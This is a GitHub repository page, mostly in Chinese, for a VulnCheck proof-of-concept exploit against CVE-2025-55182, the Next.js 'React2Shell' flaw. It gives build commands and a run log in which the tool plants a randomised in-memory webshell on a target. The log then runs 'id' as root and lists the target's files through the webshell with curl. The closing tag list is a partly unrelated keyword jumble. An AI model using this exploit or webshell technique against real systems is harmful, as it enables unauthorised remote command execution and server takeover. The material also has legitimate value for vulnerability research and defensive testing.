vulncheck-oss/cve-2025-55182

GitHub: vulncheck-oss/cve-2025-55182

针对 CVE-2025-55182 Next.js React2Shell 漏洞的 PoC 工具,支持部署随机化内存型 webshell 实现远程命令执行。

Stars: 2 | Forks: 0

# CVE-2025-55182:利用 artifacts 这是 [VulnCheck Initial Access Intelligence](https://www.vulncheck.com/product/initial-access-intelligence) 中针对 CVE-2025-55182 React2Shell 漏洞的一小部分 artifacts 导出。关于这些 artifacts 的一些团队观察结果可以在[博文](https://www.vulncheck.com/blog/reacting-to-shells-react2shell-variants-ecosystem)中阅读。 ## 索引 * [./inmem-webshell](inmem-webshell) - 一个内存型 webshell 变体 ### 构建 所有组件均基于我们的利用框架 [go-exploit](https://github.com/vulncheck-oss/go-exploit) 构建。每个目录都包含一份相关 artifact 的副本。 如果您手头有配置了 `golangci-lint` 和 GNU `make` 的 Go 构建环境,可以使用 `make`: ``` $ make gofmt -d -w cve-2025-55182.go golangci-lint run --fix --timeout 3m cve-2025-55182.go 0 issues. GOOS=linux GOARCH=amd64 go build -o build/cve-2025-55182_linux-amd64 cve-2025-55182.go ``` 要将 exploit 构建到 docker 镜像中,只需: ``` make docker ``` ### 内存型 NextJS Webshell 这是一个使用 React2Shell 针对 next.js 的内存型 webshell 实现。我们最初是在[这里](https://github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478?tab=readme-ov-file#-runtime-memory-shell-)看到此演示的。该 webshell 在每次新攻击中都会随机化。 ``` poptart@grimm $ ./build/cve-2025-55182_linux-amd64 -rhost 172.17.0.1 -rport 3000 -e time=2025-12-08T15:28:06.892-07:00 level=STATUS msg="Starting target" index=0 host=172.17.0.1 port=3000 ssl=false "ssl auto"=false time=2025-12-08T15:28:06.892-07:00 level=STATUS msg="Generating webshell payload" time=2025-12-08T15:28:06.893-07:00 level=STATUS msg="Uploading webshell to target" time=2025-12-08T15:28:16.902-07:00 level=ERROR msg="HTTP request error: Post \"http://172.17.0.1:3000/\": context deadline exceeded (Client.Timeout exceeded while awaiting headers)" time=2025-12-08T15:28:16.902-07:00 level=SUCCESS msg="Webshell installed!" location=http://172.17.0.1:3000/UByGoR time=2025-12-08T15:28:16.902-07:00 level=STATUS msg="Testing `id`" testurl="http://172.17.0.1:3000/UByGoR?z=id" time=2025-12-08T15:28:16.917-07:00 level=SUCCESS msg="uid=0(root) gid=0(root) groups=0(root)\n" time=2025-12-08T15:28:16.917-07:00 level=SUCCESS msg="Exploit successfully completed" exploited=true poptart@grimm $ curl http://172.17.0.1:3000/UByGoR?z=ls%20-l total 72 -rw-r--r-- 1 root root 77 Dec 4 23:41 jsconfig.json -rw-r--r-- 1 root root 92 Dec 4 23:41 next.config.mjs drwxr-xr-x 172 root root 173 Dec 4 23:41 node_modules -rw-r--r-- 1 root root 16384 Dec 4 23:41 notes.db -rw-r--r-- 1 root root 123663 Dec 4 23:41 package-lock.json -rw-r--r-- 1 root root 467 Dec 4 23:41 package.json -rw-r--r-- 1 root root 6028 Dec 4 23:41 seed.sql drwxr-xr-x 3 root root 3 Dec 4 23:41 src ```
标签:CISA项目, CVE-2025-55182, EVTX分析, EVTX分析, EVTX分析, Go语言, Maven, poc, RCE, React, React2Shell, Syscalls, Webshell, 内存马, 初始访问, 威胁模拟, 攻击脚本, 日志审计, 漏洞验证, 程序破解, 编程工具, 网络安全, 请求拦截, 远程代码执行, 隐私保护